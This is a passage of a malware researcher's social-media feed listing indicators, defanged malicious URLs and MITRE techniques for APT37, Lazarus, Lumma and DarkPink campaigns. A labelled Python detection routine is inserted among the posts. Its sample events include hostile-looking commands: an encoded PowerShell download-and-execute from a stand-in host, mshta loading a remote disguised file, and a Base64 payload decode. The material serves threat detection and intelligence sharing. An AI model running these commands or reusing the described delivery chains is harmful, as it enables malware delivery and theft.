Aaron Jornet
@rexorvc0.bsky.social
Threat Researcher at @socradar | Malware Researcher | Threat Hunter | CTI ¦ Former @ElevenPaths @Panda_Security

rexorvc0.com
twitter.com/RexorVc0
#IOC

936888d84b33f152d39ec539f5ce71aa
5adfa76b72236bf017f7968fd012e968
3323777ca4ac2dc2c39f5c55c0c54e3c
f3c087a0be0687afd78829cab2d3bc2b
ee7e3e39dd951f352c669f64bd8ec1b5
144928fc87e1d50f5ed162bb1651ab24
0253b33cfb3deb6a1d4bb197895c4530
[...]

VT: virustotal.com/gui/collecti...
February 20, 2025 at 7:16 AM
#TTP

📩[T1566.001] Spear-Phishing
📇[T1027.012] LNK file
📜[T1059] PS & BAT script execution
🔃[T1620] Load SC (.BAT execution)
🧩[T1140] Decrypt PE (#RokRat)
🗑️[T1070] Delete traces of Samples | Scripts
📡[T1071.001] C&C
February 20, 2025 at 7:16 AM
#APT #APT37 #RicochetChollima #ScarCruft #RokRat #threat #malware

📍🇰🇵
💥🇰🇷🌏

⛓️#Phishing > RAR|ZIP > #LNK extract .bat/PS/DOCs > #PS > #BAT execution > #PS decrypt #RokRat SC > Load + RUN #RAT > #C2

🔗360 Advanced Threat Research: mp.weixin.qq.com/s?__biz=MzUy...
February 20, 2025 at 7:16 AM
#IOC

48c179680e0b37d0262f7a402860b2a7
8ebca0b7ef7dbfc14da3ee39f478e880
1bb8b1d0282727ab9bc2deb3570cf272
bc14c3ab8316e7ec373829ea7a6e2166
61279d5e30f493bbdae9eab8ca99e9a4
2a8e4281213e4aaa485612f9ded261a2
457bb40c6fc10b3cd5a3b51e4eb672b2
...
🔗VT: virustotal.com/gui/collecti...
January 22, 2025 at 8:56 AM
#TTP

📦[T1566] #Phishing using SS
📇[T1204.002] Mal file
↪️[T1036] Compressed mal js files
📜[T1059.007] .js to execute next stage
📥[T1105] Download new files
💰[T1657] Steal wallets
⌨️[T1056.001] Keyboard monitoring
📡[T1071] C&C
January 22, 2025 at 8:56 AM
#Lazarus #LabyrinthChollima #HiddenCobra APT-C-26 #Threat #APT #malware

📍🇰🇵
💥🌏

⛓️ Social media mal delivery > Exe (Electron #bot) > .js compress > steal wallet info > Download plugins+Run > Monitor host & steal info > #C2

🔗360 Advanced TRI: mp.weixin.qq.com/s?__biz=MzUy...
January 22, 2025 at 8:56 AM
#IOC

https[:]//kankrfilez.b-cdn[.]net/
https[:]//new64.oss-ap-southeast-1.aliyuncs[.]com/
https[:]//getfilet23.b-cdn[.]net/
https[:]//denek.local-wanderer[.]shop
[...]

🔗Graph:https://virustotal.com/graph/embed/g36af090df0bc429a9b41822134061dab94f7052689f84f38a2b276e8ce31f3a4?theme=dark
December 20, 2024 at 6:07 AM
#TTP

🤖[T1204.001] Mal Links using fake CAPTCHA
📜[T1059.001] PS execution
🧩[T1027] Obfuscated scripts | commands
📥[T1105] Download .txt | .mp4 obfuscated scripts
👥[T1218] Abuse of mshta or white files to load mw
💉[T1055] Inject into another process
📡[T1071] C&C
December 20, 2024 at 6:07 AM
Tracking #Lumma & #Emmenhtal #loader through weeks targeting LATAM - #threat #malware

📍🏴
💥🇨🇴🇲🇽🇦🇷🌎

⛓️ #Link | Mal domain > Fake CAPTCHA | ZIP/RAR > Encoded PS | mshta (HTA) > download next > Obfuscated script exec > File | ZIP dropped > Injection over file > #LummaStealer
December 20, 2024 at 6:07 AM
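Added example, not code from these posts or from the 360 / NSFOCUS reports they link: a small Python triage routine over constructed Sysmon-style process-creation events that flags the host-side stages shared by the APT37 chain (LNK > PS > BAT > PS decrypt) and the Lumma/Emmenhtal chain (fake CAPTCHA > encoded PS | mshta > obfuscated download) described above, and generalizes slightly beyond them. It looks for PowerShell launched from explorer.exe with a hidden window or -EncodedCommand (what both a double-clicked .lnk and a Run-dialog paste after a fake CAPTCHA look like in telemetry), decodes the UTF-16LE Base64 payload of -EncodedCommand and checks it for download or IEX activity, flags mshta.exe loading a remote file that is not named .hta (the .txt/.mp4 lures mentioned in the TTP post), and flags a cmd.exe/.bat stage invoking PowerShell to fetch or Base64-decode the next stage. The event shape, field names, sample command lines and the example.invalid URLs are all constructed for this example and are not indicators from the posts.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal Sysmon Event ID 1 shape; field names chosen for this example."""
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Cmdlets / .NET calls typically seen in a download-and-evaluate or decode stage.
DOWNLOAD_OR_EVAL = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"invoke-expression|\biex\b|frombase64string|start-bitstransfer", re.I)
# -EncodedCommand accepts any unambiguous prefix (-e, -ec, -enc, ...), followed by Base64.
ENCODED_ARG = re.compile(r"(?:^|\s)[-/]e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"[-/]w(?:in|indowstyle)?\s+h(?:idden)?\b", re.I)
URL = re.compile(r"https?://[^\s'\"<>]+", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str | None:
    """Return the script carried by -EncodedCommand (Base64 of UTF-16LE text), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> list[str]:
    """Return the chain stages this single event matches (empty list if none)."""
    img, parent = basename(ev.image), basename(ev.parent_image)
    cl = ev.command_line
    decoded = decode_encoded_command(cl) if img in PS_IMAGES else None
    visible = cl + (" " + decoded if decoded else "")
    hits: list[str] = []
    # A Run-dialog paste (fake CAPTCHA) and a double-clicked .lnk both surface as
    # explorer.exe spawning PowerShell with a scripted command line.
    if img in PS_IMAGES and parent == "explorer.exe" and (
            decoded or HIDDEN_WINDOW.search(cl) or DOWNLOAD_OR_EVAL.search(visible)):
        hits.append("T1204 explorer.exe -> PowerShell (hidden/encoded/downloading)")
    if decoded is not None and DOWNLOAD_OR_EVAL.search(decoded):
        hits.append("T1027 encoded PowerShell that downloads or evaluates remote content")
    if img == "mshta.exe":
        m = URL.search(cl)
        if m:
            url = m.group(0)
            kind = ("remote .hta" if url.lower().rstrip("/").endswith(".hta")
                    else "remote non-.hta file (e.g. .txt/.mp4)")
            hits.append(f"T1218.005 mshta.exe loading {kind}: {url}")
    if img in PS_IMAGES and parent == "cmd.exe" and DOWNLOAD_OR_EVAL.search(visible):
        hits.append("T1059 cmd/.bat -> PowerShell download or decode stage")
    return hits


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way an attacker's launcher does."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (hypothetical paths and URLs, not indicators from the posts).
SAMPLE_EVENTS = [
    # 1. Run-dialog paste after a fake CAPTCHA page
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -nop -enc "
              + encode_ps("iex (iwr 'http://example.invalid/a.txt' -UseBasicParsing)"),
              r"C:\Windows\explorer.exe"),
    # 2. mshta pulling a payload renamed to look like media
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              "mshta http://example.invalid/video.mp4",
              r"C:\Windows\explorer.exe"),
    # 3. .bat stage invoking PowerShell to Base64-decode the next stage
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -ep bypass -c \"[IO.File]::WriteAllBytes('x.bin',"
              "[Convert]::FromBase64String((gc s.txt)))\"",
              r"C:\Windows\System32\cmd.exe"),
    # 4. Benign interactive use, should not fire
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -Command Get-Service",
              r"C:\Windows\explorer.exe"),
]


def triage(events) -> dict[int, list[str]]:
    """Map event index -> matched stages, keeping only events that fired."""
    out: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            out[i] = hits
    return out


if __name__ == "__main__":
    for idx, stages in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].command_line[:60], "->", stages)
```

Each rule fires on a single event, so no process-tree correlation is needed; in a real pipeline the same functions would run over Sysmon or EDR process events, and the decoded -EncodedCommand text is what you would hand to a sandbox or a YARA pass, since the Base64 wrapper is what defeats naive command-line keyword matching.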
#IOC

dd9146bf793ac34de3825bdabcd9f0f3
5504799eb0e7c186afcb07f7f50775b2
c5331b30587dcaf94bfde94040d4fc89
ac28e93dbf337e8d1cc14a3e7352f061
fefe7fb2072d755b0bfdf74aa7c9013e
6a3948a3602f11e58d8a9300d50984d6
91fb57a2a87ac72a5f65bc1123b02ef6
October 16, 2023 at 6:12 AM
#TTP

[T1566.001] Spear-Phishing
[T1574.002] DLL side-loading
[T1190] WinRAR exploit
[T1140] Decrypt info from fake PDF
[T1548.002] UAC bypass over \shell\open\command\ RegKey
October 16, 2023 at 6:11 AM
#APT #DarkPink #Saaiwc CVE-2023-38831 #TelePowerBot #KamiKakaBot #threat #malware

#Phishing > RAR + #CVE > Drop DLL > Side-Loading > Injection > Persistence + UAC bypass > Telegram API connection

NSFOCUS report: blog.nsfocus.net/aptdarkpinkw...
October 16, 2023 at 6:10 AM